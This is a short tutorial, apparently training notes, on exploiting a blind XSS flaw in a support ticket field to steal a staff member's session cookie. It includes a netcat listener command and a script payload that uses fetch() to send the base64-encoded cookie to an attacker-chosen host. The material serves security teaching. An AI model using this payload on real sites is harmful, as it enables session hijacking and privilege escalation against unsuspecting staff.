Let's say we want to exploit a blind-xss vulnerability we've found.
We have a Support Ticket system in which we may create tickets, which content textarea field is vulnerable to xss.
We know we're able to run JavaScript code, but we don't have access to the content on our own, so we can't list anything. But we can expand the payload to send sensitive content to our own server using netcat.
Because we're dealing with Support Ticket system, it's reasonable to assume that a staff member will also view this ticket which we could get to execute JavaScript.
Some helpful information to extract from another user would be their cookies, which we could use to elevate our privileges by hijacking their login session.
To do this, our payload will need to extract the user's cookie and exfiltrate it to another webserver server of our choice. Firstly, we'll need to set up a listening server to receive the information:
$ nc -nlvp 9001Now that we've set up the method of receiving the exfiltrated information, we build the payload:
</textarea><script>fetch('http://{URL_OR_IP:PORT}?cookie=' + btoa(document.cookie) );</script>
[!tip]
btoa()encodes the victim's cookies with base64.
Once the user opens a ticket, we can decode the cookies.